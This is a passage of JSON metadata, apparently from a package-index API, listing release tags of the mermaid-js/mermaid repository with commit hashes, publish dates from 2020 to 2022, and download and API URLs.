8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://rep